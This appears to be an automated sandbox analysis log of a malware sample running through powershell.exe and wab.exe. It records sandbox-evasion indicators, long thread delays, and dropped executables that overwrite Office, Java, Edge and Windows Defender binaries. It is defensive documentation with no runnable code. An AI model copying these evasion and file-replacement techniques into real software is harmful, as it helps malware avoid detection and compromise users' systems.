              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: powershell.exe, 00000006.00000002.2402584546.00000000034C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDOWS.FOUNDATION.DIAGNOSTICS.ASYNCCAUSALITYTRACER.DLL
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4475Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5422Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5923Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3920Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Windows\svchost.comJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
